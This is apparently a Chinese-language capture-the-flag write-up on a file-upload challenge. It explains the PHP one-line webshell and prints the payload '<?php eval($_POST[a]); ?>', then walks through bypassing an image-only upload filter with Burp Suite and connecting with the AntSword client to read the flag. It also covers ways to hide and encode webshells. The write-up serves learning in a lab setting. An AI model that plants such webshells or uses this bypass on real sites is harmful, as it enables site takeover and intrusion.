wordpress做論壇網(wǎng)站全域seo
第一次做木馬題目,有點懵逼,浮現(xiàn)一下做題思路
可以上傳一個文件,通過學習學習到了一句話木馬
一句話木馬:
利用文件上傳漏洞,往目標網(wǎng)站中上傳一句話木馬,然后你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網(wǎng)站目錄。@表示后面即使執(zhí)行錯誤,也不報錯。eval()函數(shù)表示括號內的語句字符串什么的全都當做代碼執(zhí)行。$_POST['attack']表示從頁面中獲得attack這個參數(shù)值。
文件上傳漏洞是指網(wǎng)絡攻擊者上傳了一個可執(zhí)行的文件到服務器并執(zhí)行。這里上傳的文件可以是木馬,病毒,惡意腳本或者 WebShell 等。這種攻擊方式是最為直接和有效的,部分文件上傳漏洞的利用技術門檻非常的低,對于攻擊者來說很容易實施。
Webshell簡述
WebShell 就是以 asp、php、jsp 或者 cgi 等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱之為一種網(wǎng)頁后門。攻擊者在入侵了一個網(wǎng)站后,通常會將這些 asp 或 php 后門文件與網(wǎng)站服務器 web 目錄下正常的網(wǎng)頁文件混在一起,然后使用瀏覽器來訪問這些后門,得到一個命令執(zhí)行環(huán)境,以達到控制網(wǎng)站服務器的目的(可以上傳下載或者修改文件,操作數(shù)據(jù)庫,執(zhí)行任意命令等)。
WebShell 后門隱蔽較性高,可以輕松穿越防火墻,訪問 WebShell 時不會留下系統(tǒng)日志,只會在網(wǎng)站的 web 日志中留下一些數(shù)據(jù)提交記錄,沒有經(jīng)驗的管理員不容易發(fā)現(xiàn)入侵痕跡。攻擊者可以將 WebShell 隱藏在正常文件中并修改文件時間增強隱蔽性,也可以采用一些函數(shù)對 WebShell 進行編碼或者拼接以規(guī)避檢測。除此之外,通過一句話木馬的小馬來提交功能更強大的大馬可以更容易通過應用本身的檢測,<?php eval($_POST[a]); ?>就是一個最常見最原始的小馬。
這個差不多就是基礎知識,這個網(wǎng)頁只要上傳圖片文件,別的不能上傳
1.使用burp抓包
2.將一句話木馬后綴寫成.png
上傳
將不可見改為1234.php文件,burpsuite點擊forword上傳以后一句話木馬就上傳成功了,觀察上傳木馬的后綴名可以得到該后綴名為php,說明修改成功了。
成功了
4.使用螞劍來遠程鏈接
添加數(shù)據(jù)
輸入URL地址和密碼(123)
鏈接成功,
找到flag